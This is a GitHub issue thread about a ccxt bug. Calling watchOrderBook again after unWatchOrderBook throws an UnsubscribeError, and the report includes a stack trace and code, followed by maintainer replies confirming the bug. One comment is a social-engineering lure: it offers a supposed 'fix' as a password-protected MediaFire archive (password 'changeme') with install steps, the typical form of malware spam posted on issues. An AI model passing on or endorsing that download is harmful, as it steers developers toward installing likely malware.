### ISSUE TITLE
watchOrderBook error after unWatchOrderBook called

### ISSUE THREAD

**Issue by oaixnomis** [ccxt/ccxt#23609]
### Operating System

Windows 11

### Programming Languages

JavaScript

### CCXT Version

4.3.93

### Description

today I am using the unWatchOrderBook / unWatchOrderBookForSymbols function for binance, bybit, okx, and bitget, and I get unsubscription error when trying to call watchOrderBook again after unWatchOrderBook called.

UnsubscribeError: binanceusdm orderbook::ETH/USDT:USDT
    at binanceusdm.handleUnSubscription (C:\Users\C01\Desktop\SynologyDrive\CURRENT_2\FutureThreader\node_modules\ccxt\dist\cjs\src\pro\binance.js:1032:27)
    at binanceusdm.handleSubscriptionStatus (C:\Users\C01\Desktop\SynologyDrive\CURRENT_2\FutureThreader\node_modules\ccxt\dist\cjs\src\pro\binance.js:1016:18)
    at binanceusdm.handleMessage (C:\Users\C01\Desktop\SynologyDrive\CURRENT_2\FutureThreader\node_modules\ccxt\dist\cjs\src\pro\binance.js:4212:22)
    at WsClient.onMessage (C:\Users\C01\Desktop\SynologyDrive\CURRENT_2\FutureThreader\node_modules\ccxt\dist\cjs\src\base\ws\Client.js:328:18)
    at callListener (C:\Users\C01\Desktop\SynologyDrive\CURRENT_2\FutureThreader\node_modules\ws\lib\event-target.js:290:14)
    at WebSocket.onMessage (C:\Users\C01\Desktop\SynologyDrive\CURRENT_2\FutureThreader\node_modules\ws\lib\event-target.js:209:9)
    at WebSocket.emit (node:events:520:28)
    at Receiver.receiverOnMessage (C:\Users\C01\Desktop\SynologyDrive\CURRENT_2\FutureThreader\node_modules\ws\lib\websocket.js:1220:20)
    at Receiver.emit (node:events:520:28)
    at Receiver.dataMessage (C:\Users\C01\Desktop\SynologyDrive\CURRENT_2\FutureThreader\node_modules\ws\lib\receiver.js:596:14)

### Code

```
await cexes[exName].exchange.watchOrderBook("ETH/USDT:USDT", 10);
console.log("watched")
await cexes[exName].exchange.unWatchOrderBook(["ETH/USDT:USDT"]);
console.log("unWatched")
await cexes[exName].exchange.watchOrderBook("ETH/USDT:USDT", 10);
console.log("reWatched") // fail

```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by carlosmiei** [comment]
Hello @oaixnomis, sorry for the delay.

That is not expected, we will take a look and we will let you know asap.

**Comment by carlosmiei** [comment]
@oaixnomis Managed to reproduce the issue, working on a fix.

**Comment by carlosmiei** [comment]
@oaixnomis You're welcome, please let us know if anything 🙏
